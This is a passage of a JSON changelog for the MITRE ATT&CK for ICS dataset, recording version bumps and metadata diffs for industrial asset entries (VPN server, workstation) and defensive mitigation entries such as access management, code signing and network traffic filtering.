                    "id": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945",
                    "created": "2023-09-28T15:13:07.950Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/assets/A0011",
                            "external_id": "A0011"
                        },
                        {
                            "source_name": "IEC February 2019",
                            "description": "IEC 2019, February Security for industrial automation and control systems - Part 4-2: Technical security requirements for IACS components Retrieved. 2020/09/25 ",
                            "url": "https://webstore.iec.ch/publication/34421"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-23T00:57:53.372Z",
                    "name": "Virtual Private Network (VPN) Server",
                    "description": "A VPN server is a device that is used to establish a secure network tunnel between itself and other remote VPN devices, including field VPNs. VPN servers can be used to establish a secure connection with a single remote device, or to securely bridge all traffic between two separate networks together by encapsulating all data between those networks. VPN servers typically support remote network services that are used by field VPNs to initiate the establishment of the secure VPN tunnel between the field device and server.",
                    "x_mitre_sectors": [
                        "General"
                    ],
                    "x_mitre_related_assets": [
                        {
                            "name": "Virtual Private Network (VPN) terminator",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "A VPN terminator is a device performs the role of either a VPN client or server to support the establishment of VPN connection. (Citation: IEC February 2019)"
                        },
                        {
                            "name": "Field VPN",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "Field VPN are typically deployed at remote outstations and are used to create secure connections to VPN servers within data/control center environments.  "
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Embedded",
                        "Linux",
                        "Windows"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_version": "1.1",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2023-09-28T15:13:07.950Z\", \"old_value\": \"2023-09-28 15:13:07.950000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-23T00:57:53.372Z\", \"old_value\": \"2023-10-04 18:07:59.333000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "x-mitre-asset",
                    "spec_version": "2.1",
                    "id": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41",
                    "created": "2023-09-28T14:22:49.837Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/assets/A0001",
                            "external_id": "A0001"
                        },
                        {
                            "source_name": "North American Electric Reliability Corporation June 2021",
                            "description": "North American Electric Reliability Corporation 2021, June 28 Glossary of Terms Used in NERC Reliability Standards Retrieved. 2021/10/11 ",
                            "url": "https://www.nerc.com/pa/Stand/Glossary%20of%20Terms/Glossary_of_Terms.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-23T01:04:34.868Z",
                    "name": "Workstation",
                    "description": "Workstations are devices used by human operators or engineers to perform various configuration, programming, maintenance, diagnostic, or operational tasks. Workstations typically utilize standard desktop or laptop hardware and operating systems (e.g., MS Windows), but run dedicated control system applications or diagnostic/management software     to support interfacing with the control servers or field devices. Some workstations have a fixed location within the network architecture, while others are transient devices that are directly connected to various field devices to support local management activities.",
                    "x_mitre_sectors": [
                        "General"
                    ],
                    "x_mitre_related_assets": [
                        {
                            "name": "Transient Cyber Asset (TCA)",
                            "related_asset_sectors": [
                                "Electric"
                            ],
                            "description": "A Transient Cyber Asset (TCA)(Citation: North American Electric Reliability Corporation June 2021) is a mobile workstation that is used to support management functions across multiple different networks, rather than being dedicated to any specific device/network. The TCA is often used to directly manage ICS environments that do not have any dedicated support for external remote access. Therefore, the TCA provides a mechanism for connectivity and file transfer to many networks/devices, even if they are segmented or \u201cair gapped\u201d from other networks.  "
                        },
                        {
                            "name": "Engineering Workstation (EWS)",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "An Engineering Workstation (EWS) is used to perform various maintenance, configuration, or diagnostics functions for a control system. The EWS will likely require dedicated application software to interface with various devices (e.g., RTUs, PLCs), and may be used to transfer data or files between the control system devices and other networks. "
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "Windows"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_version": "2.1",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2023-09-28T14:22:49.837Z\", \"old_value\": \"2023-09-28 14:22:49.837000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-23T01:04:34.868Z\", \"old_value\": \"2025-10-21 19:58:23.607000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                }
            ],
            "other_version_changes": [],
            "patches": [],
            "revocations": [],
            "deprecations": [],
            "deletions": []
        },
        "mitigations": {
            "additions": [],
            "major_version_changes": [],
            "minor_version_changes": [
                {
                    "type": "course-of-action",
                    "id": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-09-11 16:32:21.854000+00:00",
                    "modified": "2026-04-23 00:47:44.798000+00:00",
                    "name": "Access Management",
                    "description": "Access Management technologies can be used to enforce authorization polices and decisions, especially when existing field devices do not provide sufficient capabilities to support user identification and authentication. (Citation: McCarthy, J et al. July 2018) These technologies typically utilize an in-line network device or gateway system to prevent access to unauthenticated users, while also integrating with an authentication service to first verify user credentials. (Citation: Centre for the Protection of National Infrastructure November 2010)",
                    "revoked": false,
                    "labels": [
                        "IEC 62443-3-3:2013 - SR 2.1",
                        "IEC 62443-4-2:2019 - CR 2.1",
                        "NIST SP 800-53 Rev. 5 - AC-3"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/mitigations/M0801",
                            "external_id": "M0801"
                        },
                        {
                            "source_name": "Centre for the Protection of National Infrastructure November 2010",
                            "description": "Centre for the Protection of National Infrastructure 2010, November Configuring and Managing Remote Access for Industrial Control Systems Retrieved. 2020/09/25 ",
                            "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/RP_Managing_Remote_Access_S508NC.pdf"
                        },
                        {
                            "source_name": "McCarthy, J et al. July 2018",
                            "description": "McCarthy, J et al. 2018, July NIST SP 1800-2 Identity and Access Management for Electric Utilities Retrieved. 2020/09/17 ",
                            "url": "https://doi.org/10.6028/NIST.SP.1800-2"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 00:47:44.798000+00:00\", \"old_value\": \"2025-03-12 16:11:54.933000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "course-of-action",
                    "id": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-06-11 17:06:14.029000+00:00",
                    "modified": "2026-04-23 00:54:39.756000+00:00",
                    "name": "Audit",
                    "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses. Perform periodic integrity checks of the device to validate the correctness of the firmware, software, programs, and configurations. Integrity checks, which typically include cryptographic hashes or digital signatures, should be compared to those obtained at known valid states, especially after events like device reboots, program downloads, or program restarts.",
                    "revoked": false,
                    "labels": [
                        "IEC 62443-3-3:2013 - SR 3.4",
                        "IEC 62443-4-2:2019 - CR 3.4",
                        "NIST SP 800-53 Rev. 4 - SI-7",
                        "NIST SP 800-53 Rev. 5 - SI-7"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/mitigations/M0947",
                            "external_id": "M0947"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 00:54:39.756000+00:00\", \"old_value\": \"2025-04-16 21:26:31.848000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "course-of-action",
                    "id": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-09-11 16:32:21.854000+00:00",
                    "modified": "2026-04-23 00:54:03.965000+00:00",
                    "name": "Authorization Enforcement",
                    "description": "The device or system should restrict read, manipulate, or execute privileges to only authenticated users who require access based on approved security policies.  Role-based Access Control (RBAC) schemes can help reduce the overhead of assigning permissions to the large number of devices within an ICS. For example, IEC 62351 provides examples of roles used to support common system operations within the electric power sector  (Citation: International Electrotechnical Commission July 2020), while IEEE 1686 defines standard permissions for users of IEDs. (Citation: Institute of Electrical and Electronics Engineers January 2014)",
                    "revoked": false,
                    "labels": [
                        "IEC 62443-3-3:2013 - SR 2.1",
                        "IEC 62443-4-2:2019 - CR 2.1",
                        "NIST SP 800-53 Rev. 5 - AC-3"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/mitigations/M0800",
                            "external_id": "M0800"
                        },
                        {
                            "source_name": "Institute of Electrical and Electronics Engineers January 2014",
                            "description": "Institute of Electrical and Electronics Engineers 2014, January 1686-2013 - IEEE Standard for Intelligent Electronic Devices Cyber Security Capabilities Retrieved. 2020/09/17 ",
                            "url": "https://standards.ieee.org/standard/1686-2013.html"
                        },
                        {
                            "source_name": "International Electrotechnical Commission July 2020",
                            "description": "International Electrotechnical Commission 2020, July 17 IEC 62351 - Power systems management and associated information exchange - Data and communications security Retrieved. 2020/09/17 ",
                            "url": "https://webstore.iec.ch/publication/6912"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.2",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 00:54:03.965000+00:00\", \"old_value\": \"2023-10-20 17:01:38.562000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.2\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 1.2"
                },
                {
                    "type": "course-of-action",
                    "id": "course-of-action--8ac1d6e1-b07f-476a-9732-84984ebc2405",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-06-11 17:02:36.984000+00:00",
                    "modified": "2026-04-23 00:55:57.931000+00:00",
                    "name": "Boot Integrity",
                    "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
                    "revoked": false,
                    "labels": [
                        "IEC 62443-4-2:2019 - CR 3.14",
                        "NIST SP 800-53 Rev. 5 - SI-7"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/mitigations/M0946",
                            "external_id": "M0946"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 00:55:57.931000+00:00\", \"old_value\": \"2025-04-16 21:26:29.725000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "course-of-action",
                    "id": "course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-06-11 17:01:25.405000+00:00",
                    "modified": "2026-04-23 00:54:56.965000+00:00",
                    "name": "Code Signing",
                    "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
                    "revoked": false,
                    "labels": [
                        "IEC 62443-3-3:2013 - SR 3.4",
                        "IEC 62443-4-2:2019 - CR 3.4",
                        "NIST SP 800-53 Rev. 5 - SI-7"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/mitigations/M0945",
                            "external_id": "M0945"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 00:54:56.965000+00:00\", \"old_value\": \"2025-04-16 21:26:28.975000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "course-of-action",
                    "id": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-09-11 16:32:21.854000+00:00",
                    "modified": "2026-04-23 00:54:21.289000+00:00",
                    "name": "Communication Authenticity",
                    "description": "When communicating over an untrusted network, utilize secure network protocols that both authenticate the message sender and can verify its integrity. This can be done either through message authentication codes (MACs) or digital signatures, to detect spoofed network messages and unauthorized connections.",
                    "revoked": false,
                    "labels": [
                        "IEC 62443-3-3:2013 - SR 3.1",
                        "IEC 62443-4-2:2019 - CR 3.1",
                        "NIST SP 800-53 Rev. 5 - SC-8; SC-23"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/mitigations/M0802",
                            "external_id": "M0802"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 00:54:21.289000+00:00\", \"old_value\": \"2025-04-16 21:26:32.013000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "course-of-action",
                    "id": "course-of-action--7f153c28-e5f1-4764-88fb-eea1d9b0ad4a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-09-11 16:32:21.854000+00:00",
                    "modified": "2026-04-23 00:55:38.098000+00:00",
                    "name": "Encrypt Network Traffic",
                    "description": "Utilize strong cryptographic techniques and protocols to prevent eavesdropping on network communications.",
                    "revoked": false,
                    "labels": [
                        "IEC 62443-3-3:2013 - SR 4.1",
                        "IEC 62443-4-2:2019 - CR 4.1",
                        "NIST SP 800-53 Rev. 5 - SC-8"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/mitigations/M0808",
                            "external_id": "M0808"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 00:55:38.098000+00:00\", \"old_value\": \"2025-04-16 21:26:29.147000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "course-of-action",
                    "id": "course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-06-11 16:43:44.834000+00:00",
                    "modified": "2026-04-23 00:56:16.357000+00:00",
                    "name": "Encrypt Sensitive Information",
                    "description": "Protect sensitive data-at-rest with strong encryption.",
                    "revoked": false,
                    "labels": [
                        "IEC 62443-3-3:2013 - SR 4.1",
                        "IEC 62443-4-2:2019 - CR 4.1",
                        "NIST SP 800-53 Rev. 5 - SC-28"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/mitigations/M0941",
                            "external_id": "M0941"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 00:56:16.357000+00:00\", \"old_value\": \"2025-04-16 21:26:31.005000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "course-of-action",
                    "id": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-06-11 16:33:55.337000+00:00",
                    "modified": "2026-04-23 00:45:45.801000+00:00",
                    "name": "Filter Network Traffic",
                    "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.   Perform inline allow/denylisting of network messages based on the application layer (OSI Layer 7) protocol, especially for automation protocols. Application allowlists are beneficial when there are well-defined communication sequences, types, rates, or patterns needed during expected system operations. Application denylists may be needed if all acceptable communication sequences cannot be defined, but instead a set of known malicious uses can be denied (e.g., excessive communication  attempts, shutdown messages, invalid commands).  Devices performing these functions are often referred to as deep-packet inspection (DPI) firewalls, context-aware firewalls, or firewalls blocking specific automation/SCADA protocol aware firewalls. (Citation: Centre for the Protection of National Infrastructure February 2005)",
                    "revoked": false,
                    "labels": [
                        "IEC 62443-3-3:2013 - SR 5.1",
                        "IEC 62443-4-2:2019 - CR 5.1",
                        "NIST SP 800-53 Rev. 5 - AC-3; SC-7"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/mitigations/M0937",
                            "external_id": "M0937"
                        },
                        {
                            "source_name": "Centre for the Protection of National Infrastructure February 2005",
                            "description": "Centre for the Protection of National Infrastructure 2005, February FIREWALL DEPLOYMENT FOR SCADA AND PROCESS CONTROL NETWORKS Retrieved. 2020/09/17 ",
                            "url": "https://www.energy.gov/sites/prod/files/Good%20Practices%20Guide%20for%20Firewall%20Deployment.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 00:45:45.801000+00:00\", \"old_value\": \"2025-04-16 21:26:26.074000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "course-of-action",
                    "id": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-09-11 16:32:21.854000+00:00",
                    "modified": "2026-04-23 00:50:55.165000+00:00",
                    "name": "Human User Authentication",
                    "description": "Require user authentication before allowing access to data or accepting commands to a device. While strong multi-factor authentication is preferable, it is not always feasible within ICS environments. Performing strong user authentication also requires additional security controls and processes which are often the target of related adversarial techniques (e.g., Valid Accounts, Default Credentials). Therefore, associated ATT&CK mitigations should be considered in addition to this, including [Multi-factor Authentication](https://attack.mitre.org/mitigations/M0932), [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), [User Account Management](https://attack.mitre.org/mitigations/M0918), [Privileged Account Management](https://attack.mitre.org/mitigations/M0926), and [User Account Control](https://attack.mitre.org/mitigations/M1052).",
                    "revoked": false,
                    "labels": [
                        "IEC 62443-3-3:2013 - SR 1.1",
                        "IEC 62443-4-2:2019 - CR 1.1",
                        "NIST SP 800-53 Rev. 5 - IA-2"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/mitigations/M0804",
                            "external_id": "M0804"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.2",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 00:50:55.165000+00:00\", \"old_value\": \"2023-10-20 17:02:00.299000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.2\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 1.2"
                },
                {
                    "type": "course-of-action",
                    "id": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-06-10 20:53:36.319000+00:00",
                    "modified": "2026-04-23 00:56:32.131000+00:00",
                    "name": "Network Allowlists",
                    "description": "Network allowlists can be implemented through either host-based files or system hosts files to specify what connections (e.g., IP address, MAC address, port, protocol) can be made from a device. Allowlist techniques that operate at the  application layer (e.g., DNP3, Modbus, HTTP) are addressed in [Filter Network Traffic](https://attack.mitre.org/mitigations/M0937) mitigation.",
                    "revoked": false,
                    "labels": [
                        "NIST SP 800-53 Rev. 5 - AC-3"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/mitigations/M0807",
                            "external_id": "M0807"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 00:56:32.131000+00:00\", \"old_value\": \"2025-04-16 21:26:31.149000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "course-of-action",
                    "id": "course-of-action--3172222b-4983-43f7-8983-753ded4f13bc",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-06-10 20:46:02.263000+00:00",
                    "modified": "2026-04-23 00:47:04.457000+00:00",
                    "name": "Network Intrusion Prevention",
                    "description": "Use intrusion detection signatures to block traffic at network boundaries.  In industrial control environments, network intrusion prevention should be configured so it will not disrupt protocols and communications responsible for real-time functions related to control or safety.",
                    "revoked": false,
                    "labels": [
                        "IEC 62443-3-3:2013 - SR 6.2",
                        "IEC 62443-4-2:2019 - CR 6.2",
                        "NIST SP 800-53 Rev. 5 - SI-4"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/mitigations/M0931",
                            "external_id": "M0931"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 00:47:04.457000+00:00\", \"old_value\": \"2025-04-16 21:26:27.092000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "course-of-action",
                    "id": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-06-10 20:41:03.271000+00:00",
                    "modified": "2026-04-23 00:46:09.190000+00:00",
                    "name": "Network Segmentation",
